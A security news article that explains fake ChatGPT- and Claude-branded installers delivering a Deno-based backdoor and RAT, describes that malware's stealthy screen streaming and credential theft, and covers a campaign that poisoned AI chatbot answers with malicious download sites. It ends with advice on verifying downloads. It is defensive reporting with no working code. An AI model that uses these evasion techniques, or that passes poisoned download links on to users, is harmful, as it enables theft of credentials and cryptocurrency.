What Fake AI Installers Are and Why They Matter
Fake AI installers are counterfeit setup files or scripts that pretend to install popular AI tools or utilities but instead deliver malware, enabling credential theft, cryptojacking, and persistent remote access to victims’ systems. These fake AI installers often imitate well-known names such as ChatGPT, Claude, and other trusted PC utilities, and they are distributed through credible-looking channels like GitHub, SourceForge, and search results surfaced by AI chatbots. Threat actors exploit user trust in open-source platforms and AI recommendations to push malware downloads that appear genuine at a glance. Because many targets are developers, creators, and gamers, the stakes are high: compromised systems may leak cryptocurrency wallets, browser sessions, or chat accounts, and powerful GPUs can be hijacked for cryptomining. Understanding how these malware downloads work is the first step toward avoiding them.
How Deno RAT Malware Hides Inside Fake ChatGPT and Claude Installers
Recent GitHub malware threats involve repositories that masquerade as installers or plugins for tools like ChatGPT, Claude, AutoTune, Kontakt, Ableton Live, and ZENOLOGY. Visitors are instructed to open a terminal and paste commands that fetch MSI installers or PowerShell scripts from GitHub for Windows and macOS. These scripts install Scoop and WinGet, then pull the legitimate Deno runtime, which in turn loads the DinDoor backdoor directly from a remote server in memory. DinDoor maintains persistence, reports system data, and delivers a Deno-based RAT known as Smokest. This RAT can run commands, capture screenshots, manage files, open SOCKS5 proxies, and steal more than 50 cryptocurrency wallet extensions and multiple wallet apps, including Atomic Wallet and Exodus. According to Malwarebytes, the campaign uses compromised YouTube channels with AI-generated videos, some gaining more than 50,000 views, to funnel users toward these fake AI installers.
Screen Streaming, Browser Abuse, and Stealthy Credential Theft
Beyond typical data theft, the Deno-based RAT features a stealthy screen streaming capability that makes these fake AI installers especially dangerous. To watch a victim’s activity in real time, the malware silently launches Microsoft Edge, connects through the Chrome DevTools Protocol, and injects a WebRTC page. Edge then relays encrypted video frames directly to the attacker over a peer-to-peer connection, hiding the stream inside a legitimate browser process and helping it evade network inspection. At the same time, the stealer module targets Chromium-based browsers like Chrome, Brave, Edge, Opera, and Vivaldi, as well as Telegram, Discord, and Lightcord, gathering cookies, sessions, and stored credentials. Since persistence is set through registry Run keys and all stages use mainstream tools such as Scoop, WinGet, and Deno, many security solutions see nothing unusual. The result is a potent mix of remote access, surveillance, and credential theft wrapped in a convincing AI tool installer.
AI Chatbots and Cryptojacking Malware Targeting Gamers
Threat actors are also turning AI chatbots themselves into part of the malware delivery chain. Microsoft Defender Experts reported an active cryptojacking campaign in which AI chatbots recommended malicious domains posing as official download sites for popular PC utilities like CrystalDiskInfo, HWMonitor, Display Driver Uninstaller, FurMark, K-Lite Codec Pack, and PDFgear. These fake downloads install cryptojacking malware aimed at users with high-performance GPUs, who offer better cryptocurrency mining potential. According to Microsoft, the same campaign not only mines cryptocurrency but also “establishes persistent remote access” by abusing ScreenConnect, opening the door to data theft, lateral movement, or even ransomware. This AI search result poisoning extends traditional SEO poisoning: instead of only poisoning search engines, attackers now seed malicious sites that AI chatbots suggest as trustworthy download links, catching users who rely on chatbot recommendations when searching for software.
How to Verify Downloads, Spot Fake AI Installers, and Stay Safe
To avoid fake AI installers and other malware downloads, always start from official project pages or trusted vendor sites, not links from random videos, forums, or chatbot answers. When you must use sites like GitHub or SourceForge, verify that the repository belongs to the official organization or developer, check its history, release notes, and community activity, and avoid copying terminal commands from unknown accounts. On Windows and macOS, inspect installer signatures before running them and ensure they are signed by the expected publisher. Be wary of scripts that install extra package managers or runtimes without clear reasons. For AI chatbots, treat download URLs as suggestions to verify, not links to click blindly—cross-check them in your browser’s address bar and through search, ensuring they match official domains. Finally, keep endpoint protection enabled, use cloud-delivered protection and EDR features where available, and monitor systems with high-end GPUs for unusual resource usage.